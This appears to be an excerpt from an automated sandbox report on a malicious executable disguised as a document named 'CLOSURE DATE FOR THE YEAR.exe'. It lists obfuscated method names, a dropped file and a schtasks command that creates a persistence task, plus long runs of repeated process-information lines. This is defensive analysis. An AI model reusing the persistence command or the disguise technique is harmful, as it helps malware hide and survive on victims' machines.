Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, vt6OdGgtWVkrmoPpyf.cs	High entropy of concatenated method names: 'jpNAwx2Bye0Yi2tbaya', 'NweTip2tRbBEvxVD3Fm', 'xKDJtUPVIN', 'QakJ0auA7R', 'kgnJpllror', 'HYagQQ2QEiDwJkEKIuj', 'J09dcL2ME3XVWa40XhZ', 'wCnToZ2wDEj8i6aWMLN'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, tcTjZnfH2xCKW4Wn2U.cs	High entropy of concatenated method names: 'fAaoMgq5K1', 'lGeoUBooaK', 'HHco61U2Km', 'RbPo7V78h0', 'BcMo8efLZn', 'UcyoH2XS3Z', 'ThBfO1iawoEZ54mBXH', 'fu2cRScrjtd2NDtBiy', 'XHnoogPxvy', 'eN8oCIcrFq'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, iHL0ugXHc1U2KmhbPV.cs	High entropy of concatenated method names: 'a1M2G03DTC', 'sew2xSAuD6', 'vVT2suMmUQ', 'qxt2XKa1cY', 'Ct428tKg66', 'HHb2HmeqbK', 'nNj2khoE4m', 'yje2tjvu9m', 'wTX20gh7uo', 'Q6l2pNbSEI'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, swx3Z7yEPbC2qYGpNs.cs	High entropy of concatenated method names: 'ToString', 'z5DH1YaA2M', 'A8iHg3mIBZ', 'hifHBNWEEU', 'X7LHPytaVe', 'SYDHSUbXhY', 'UP9HLMkuHQ', 'oPsHdTb1S3', 's5yHErbVod', 'k8YHeKZi00'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, J3HuoK4x7sHRBmYd8P.cs	High entropy of concatenated method names: 'DuFj9X9Wi', 'mQeGEFFA9', 'qysx0ESBA', 'CLEWFSLDe', 'YRTXb5MZo', 'WQEiaYn3B', 'wMQFmQVBTMRQbwR7OM', 'U9qlcy5LhVL95ccJFs', 'eEuXwMmtbvZEAlwD0Z', 'q6atPqbcG'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, uS0YNRrX5wLVHg6CLX.cs	High entropy of concatenated method names: 'Sa408YcMXJ', 'LNH0kwUkbC', 'G3o0075fRP', 'BW80amW8kQ', 'BAZ0AX3liP', 'aQv0979cPm', 'Dispose', 'EfvtOmJg8V', 'cmFtluR13O', 'onWt2vL1pG'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, IJ2K90edp4HgKMGk5G.cs	High entropy of concatenated method names: 'cu6MQjT1Wl', 'NN9MNqcW29', 'SlPMjyP45d', 'BnWMGUbjsc', 'P20M3up2qA', 'YebMx2FfQp', 'shnMWL20dY', 'lANMs9MCNb', 'cXZMX0t8Kh', 'zyHMi7kBl7'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, ut7yIPoojS59To19taD.cs	High entropy of concatenated method names: 'YKdpu7WHeo', 'W1mpzohjtJ', 'idsamkLKj9', 'Rl7aoUyWrN', 'p4Ta4QXXNK', 'z5faCHHqZM', 'xdeafK0XLY', 'bD8aYKRhgJ', 'YNiaOEEM27', 'JQTal4XGQ1'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, i0rvbCom5cxEaaFcfVu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FI0p1Cjibd', 'H8mp5YqFlF', 'IippbxDirZ', 'cGypDljnoV', 'M9Xph5HX0x', 'ShSpyhQyv3', 'nY3pTBcRm9'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, msNyQU2nVWMubc2q1n.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pi44KDWbc1', 'GaV4uPm3uv', 'aCp4zeD8tC', 'KR4CmJjDSZ', 'uWECowchEe', 'HA7C4iotwh', 'N3MCCxXIJx', 'NWhQqKIkjl7XCJTV3Fd'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, dxLZjud1Le1aRTLBqp.cs	High entropy of concatenated method names: 'UsZMOePw1V', 'c85M2UdnPK', 'WJSMJdyHmP', 'kpuJuiWrMU', 'jHJJz3VfZJ', 'ReqMmPx8E9', 'tOMMol6iJa', 'mntM4JQPsG', 'DL3MCRBFlF', 'D6TMfy0jxs'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, IIb6nsuCF2hJDVepff.cs	High entropy of concatenated method names: 'txxp24Gh5A', 'iOcpqMQEec', 'j8rpJQ0OsH', 'lAjpMtffXT', 'Kqdp0s12fE', 'C4bpU8y9I4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.cs	High entropy of concatenated method names: 'gjECY81nYS', 'yQOCOeVYQB', 'h6yClLU1vp', 'n9JC2R9y0m', 'mHmCqOfwam', 'RAiCJaWLVj', 'Qf3CMrFd8n', 'gcNCUlrEb3', 'lfnCnahlOt', 'RfEC6Ix2RZ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, kNh5SizdpcJ7dyOosl.cs	High entropy of concatenated method names: 'JFcpx5onqD', 'wBipsfSr8t', 'HEBpXSiE4a', 'T2npwLlE5j', 'cERpgMSbFL', 'crHpPgPLO2', 'fTgpSQjwnw', 'CKsp9kOsPL', 'jOUpQoJaj5', 'NPopNPWONn'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, MB18GvlNmXshVsF6VX.cs	High entropy of concatenated method names: 'Dispose', 'GLVoKHg6CL', 'WJf4g5Epmb', 'jXI5ityLne', 'ERqou1wwiC', 'gqoozFk91n', 'ProcessDialogKey', 'y4j4m8paIc', 'prf4oZRQqD', 'isW44PIb6n'

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

File created: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
